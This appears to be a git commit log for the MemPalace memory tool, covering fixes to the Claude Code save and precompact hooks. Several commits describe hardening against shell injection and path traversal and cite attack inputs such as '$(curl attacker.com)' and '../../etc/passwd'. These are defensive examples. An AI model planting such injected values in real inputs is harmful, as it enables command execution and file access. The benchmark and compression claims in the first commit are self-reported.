Commit Graph

14 Commits

Author SHA1 Message Date
Igor Lins e Silva fe56797762 fix(hooks): consolidate transcript ingest, harden shell parsers (#1231 review)
Address Copilot review on #1231:

1. Stop double-mining the transcript on the Python side. ``_get_mine_targets``
   now returns only the ``MEMPAL_DIR`` projects target — the convos target
   for the transcript dir is dropped because ``_ingest_transcript`` already
   handles it on every hook fire. The duplicate spawn was using
   ``sys.executable`` (vs ``_mempalace_python()``) and a different ``--wing``,
   so each Stop/PreCompact event was writing the same transcript into two
   wings under asymmetric interpreters and overwriting the single
   ``_MINE_PID_FILE`` lock.

2. ``_maybe_auto_ingest`` and ``_mine_sync`` now spawn via
   ``_mempalace_python()`` so the resolved interpreter matches the venv
   that owns mempalace (matters under GUI-launched harnesses where
   ``sys.executable`` may resolve to a system Python without chromadb).

3. Replace ``eval $(...)`` in both shell hooks with a ``mapfile``-based
   reader. Sanitized values are still emitted by the same Python parser,
   but the shell now does plain variable assignment instead of executing
   the parser's stdout — smaller blast radius if the sanitizer is ever
   bypassed.

4. Mirror ``_validate_transcript_path`` in the shell hooks via a
   ``is_valid_transcript_path`` helper — extension + traversal-segment
   rejection, parity with the Python validator. The convos mine in each
   shell hook is now gated on the validator instead of bare ``-f``.

5. Tighten the ``..`` traversal test that previously exercised the
   suffix gate by mistake (``../../etc/passwd`` lacks ``.json[l]``).
   Use ``.jsonl`` paths with traversal segments to actually hit the
   ``..`` rejection branch.

6. README: add a one-liner pointing at ``mempalace sweep`` for users
   who want per-message recall on top of the file-level chunks the
   hooks produce. The sweeper was undiscoverable previously.

Tests: 1418 passed, 1 skipped (full suite minus benchmarks).
2026-04-27 02:26:53 -03:00
Igor Lins e Silva eb4de04339 fix(hooks): always mine the active transcript as convos, additive to MEMPAL_DIR
#1230 fixed --mode convos for the case where MEMPAL_DIR was unset, but
left two configurations broken:

  - MEMPAL_DIR set to a project dir: convos never mined (MEMPAL_DIR
    overrode the transcript path); only project files were ingested.
  - MEMPAL_DIR set to a conversations dir per the old hooks/README: the
    projects miner ran on JSONL — same wrong-miner behaviour.

The shell hooks (mempal_save_hook.sh, mempal_precompact_hook.sh) had
the same MEMPAL_DIR-overrides-transcript bug AND were missing --mode
on every spawned `mempalace mine` call.

Make the auto-ingest *additive*. _get_mine_dir → _get_mine_targets,
returning a list of (dir, mode) pairs:

  - MEMPAL_DIR (when valid) contributes (dir, "projects")
  - A valid transcript JSONL contributes (parent, "convos")
  - Both can appear together; the hook spawns one ingest per target

Same change applied to the shell save and precompact hooks. Precompact
also gained transcript_path parsing so it can run the convos mine
synchronously before context is compressed. hooks/README.md updated to
describe MEMPAL_DIR as a project-files target, never a convos target.
2026-04-27 00:32:35 -03:00
jp 74e9cbcfd3 feat: deterministic hook saves — zero data loss via silent Python API
Adds a `hook_silent_save` mode (default `true` in new installs) where
the stop and precompact hooks write diary entries directly via the
Python API — no AI block, no MCP tool roundtrip, no possibility of the
AI forgetting or ignoring the save instruction.

**Two modes, controlled by `hook_silent_save` in `~/.mempalace/config.json`:**

1. **Silent mode** (default): Direct call to `tool_diary_write()`. Plain
   text, no AI involved, deterministic. Save marker advances only after
   the write is confirmed, so mid-save failures do not lose exchanges.
   Shows `"✦ N memories woven into the palace"` as a systemMessage
   notification so the user knows the save fired.

2. **Block mode** (legacy): Returns `{"decision": "block"}` asking the
   AI to call the MCP tool chain. Non-deterministic — the AI may ignore,
   summarize lossy, or fail. Kept for backward compatibility.

**Extras rolled in:**
- Block reasons name "MemPalace" explicitly and instruct the AI not to
  write to Claude Code's native auto-memory (.md files) — prevents the
  two memory systems from stepping on each other.
- Codex transcript handling (`event_msg` payloads) in
  `_count_human_messages` + `_extract_recent_messages`.
- Tightened stopword leak in diary summaries; docstring polish; test
  hermeticity fixes (per-test `STATE_DIR` patching).

**Tests:** hooks_cli tests cover silent-save path, save-marker
advancement after confirmed write only, and systemMessage formatting.

Rebased fresh on upstream/develop. Only touches files germane to the
feature (hooks_cli.py, tests, hooks/README.md, HOOKS_TUTORIAL.md) —
stale fork-local `.sh` wrapper and plugin manifest changes dropped.
2026-04-21 13:20:52 -07:00
Igor Lins e Silva 48eb6271a7 fix(hooks): MEMPAL_PYTHON override for .sh hooks' internal python3 calls
The legacy hook scripts `hooks/mempal_save_hook.sh` and
`hooks/mempal_precompact_hook.sh` shell out to `python3` for JSON
parsing and transcript-message counting. On macOS GUI launches of
Claude Code — `open -a`, Spotlight, the dock — the harness inherits
`PATH` from launchd (`/usr/bin:/bin:/usr/sbin:/sbin`), which may not
contain a `python3` at all, or may contain only a system Python that
lacks what the hook needs. The hook then fails silently in the
background log where users never look.

`mempalace` auto-ingest itself is unaffected — #340 switched that
path to the `mempalace` CLI entry point, which pipx/uv install on a
stable global PATH.

This PR adds a `MEMPAL_PYTHON` environment variable that users can
set to point the hook at any Python 3 interpreter. Resolution order
applied at each `python3` invocation site inside the two hooks:

  1. $MEMPAL_PYTHON (if set and executable)
  2. $(command -v python3) on PATH
  3. bare `python3` as a last resort

The interpreter does not need `mempalace` installed in it — only the
standard-library `json` and `sys` modules. The hook's `mempalace mine`
call runs via the CLI, independent of this override.

hooks/README.md documents the macOS GUI PATH issue and the
MEMPAL_PYTHON override. tests/test_hooks_shell.py adds 3 regression
tests (Linux/macOS only, POSIX bash):

  - MEMPAL_PYTHON override wins over PATH (proved via a
    marker-emitting shim that proxies to the real interpreter).
  - Non-executable MEMPAL_PYTHON falls back to PATH rather than
    crashing on permission denied.
  - Unset MEMPAL_PYTHON resolves via PATH.

`hooks_cli.py` (the Python implementation invoked via
`mempalace hook run ...`) already uses `sys.executable` and is
therefore trivially correct — no changes needed there.

Supersedes abandoned branch `fix/hook-bugs`.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>
2026-04-21 01:43:08 -03:00
Pim Messelink 67a067701e fix: use mempalace CLI in top-level hook scripts
hooks/mempal_precompact_hook.sh and hooks/mempal_save_hook.sh used
python3 -m mempalace mine which fails when mempalace is installed via
pipx or uv. Switch to the mempalace CLI entry point which pipx/uv put
on PATH. Also removes the now-unused PYTHON variable from mempal_save_hook.sh.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-21 01:26:47 -03:00
MSL df986fd5e2 fix: replace invalid 'decision: allow' with {} in hooks
Closes #872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 12:39:35 -07:00
Milla J 3ac75d0fdb feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)
export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 10:55:56 -07:00
BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00
Milla J 045023f449 fix: save hook auto-mines transcript without MEMPAL_DIR (#840)
TDD: test written first, failed, then fixed.

Problem: save hook says "saved in background" but MEMPAL_DIR defaults
to empty, so nothing actually mines. Users get no auto-save despite
the hook firing every 15 messages.

Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's
JSON input) to discover the session directory. Mine that directory
automatically. MEMPAL_DIR is still supported as override but no
longer required.

Also fixed: bare python3 → $(command -v python3) for nohup safety.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 18:09:59 -07:00
MSL a3b7988d87 fix: stop hooks from making agents write in chat — save tokens
The save hook and precompact hook were telling the agent to write
diary entries, add drawers, and add KG triples IN THE CHAT WINDOW.
Every line written stays in conversation history and retransmits on
every subsequent turn — ~$1/session in wasted tokens.

Fix: hooks now say "saved in background, no action needed" and use
decision: allow instead of block. The agent continues working without
interruption. All filing happens via the background pipeline.

Also updated hooks README with:
- Known limitation: hooks require session restart after install
- Updated cost section: zero tokens, background-only

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 16:41:59 -03:00
bensig 1d19dfc9d5 security: harden inputs, fix shell injection, optimize DB access
- Fix command injection in hook script (pass paths via sys.argv)
- Add sanitize_name/sanitize_content validators in config.py
- Add 10MB file size guard + symlink skip in miners
- Fix SQLite connection leak in knowledge_graph.py (reuse connection)
- Use `with conn:` for proper transaction handling
- Consolidate shared palace operations into palace.py
- Add write-ahead log for audit trail on writes/deletes
- Add metadata cache with 30s TTL for status/taxonomy calls
- Upgrade md5 → sha256 for drawer/triple IDs
- Harden file permissions (0o700/0o600)
- Pin chromadb>=0.5.0,<0.7

Based on PR #252 by @anthonyonazure with lint fixes applied.

Co-Authored-By: anthonyonazure <anthonyonazure@users.noreply.github.com>
2026-04-09 08:06:30 -07:00
Igor Lins e Silva 50239d4b49 fix: sanitize SESSION_ID in save hook to prevent path traversal
The save hook uses SESSION_ID in file paths (state_dir/).
A crafted session_id value like '../../etc/cron.d/evil' could write
state files outside the intended directory.

Strip everything except [a-zA-Z0-9_-] from SESSION_ID, defaulting
to 'unknown' if empty after sanitization.

Finding: #4 (HIGH — path traversal via SESSION_ID)

Includes test infrastructure from PR #131.
92 tests pass.
2026-04-07 18:53:31 -03:00
bensig 186bb2e3d1 fix: shell injection in hooks, Claude Code mining, chromadb pin
- hooks/mempal_save_hook.sh: pass $TRANSCRIPT_PATH as sys.argv
  instead of interpolating into python -c string (fixes #110)
- normalize.py: accept type "user" in addition to "human" for
  Claude Code JSONL sessions (fixes #111)
- convo_miner.py: skip tool-results/, memory/ dirs and .meta.json
  files when scanning for conversations (fixes #111)
- pyproject.toml: pin chromadb>=0.4.0,<1 to avoid crashing 1.x
  builds on macOS ARM64 (fixes #100)
2026-04-07 11:45:51 -07:00
Milla Jovovich 068dbd9a7b MemPalace: palace architecture, AAAK compression, knowledge graph
The memory system:
- Palace structure: Wings (people/projects) → Rooms (topics) → Closets (AAAK compressed) → Drawers (verbatim transcripts)
- Halls connect related rooms within a wing
- Tunnels cross-reference rooms across wings
- AAAK: 30x lossless compression dialect for AI agents
- Knowledge graph: temporal entity-relationship triples (SQLite)
- Palace graph: room-based navigation with tunnel detection
- MCP server: 19 tools — search, graph traversal, agent diary, AAAK auto-teach
- Onboarding: guided setup generates wing config + AAAK entity registry
- Contradiction detection: catches wrong pronouns, names, ages
- Auto-save hooks for Claude Code

96.6% Recall@5 on LongMemEval — highest zero-API score published.
100% with optional Haiku rerank (500/500).
Local. Free. No API key required.
2026-04-04 18:16:04 -07:00